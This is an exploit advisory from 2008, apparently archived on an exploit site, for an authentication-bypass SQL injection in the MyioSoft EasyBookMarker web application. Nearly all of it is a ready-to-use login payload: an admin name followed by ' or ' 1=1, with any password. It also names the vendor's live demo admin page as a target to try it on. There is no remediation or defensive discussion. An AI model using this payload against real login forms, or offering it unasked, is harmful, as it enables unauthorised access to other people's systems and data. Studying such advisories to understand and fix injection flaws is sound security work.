id: 4118
date: 11/07/2008
title: MyioSoft EasyBookMarker (Auth Bypass) SQL Injection Vulnerability
author: ZoRLu
cves: 

=================================================================
MyioSoft EasyBookMarker (Auth Bypass) SQL Injection Vulnerability
=================================================================


[~] MyioSoft EasyBookMarker Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 07.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------

Exploit:

username: [real_admin_name] ' or ' 1=1  ( you must know admin_name )

password: ZoRLu

note: generally admin name: admin


admin login for demo:

http://myiosoft.com/products/EasyBookMarker/demo/


example for demo:

admin: demo1 ' or ' 1=1

passwd: ZoRLu



#  0day.today [2023-03-25]  #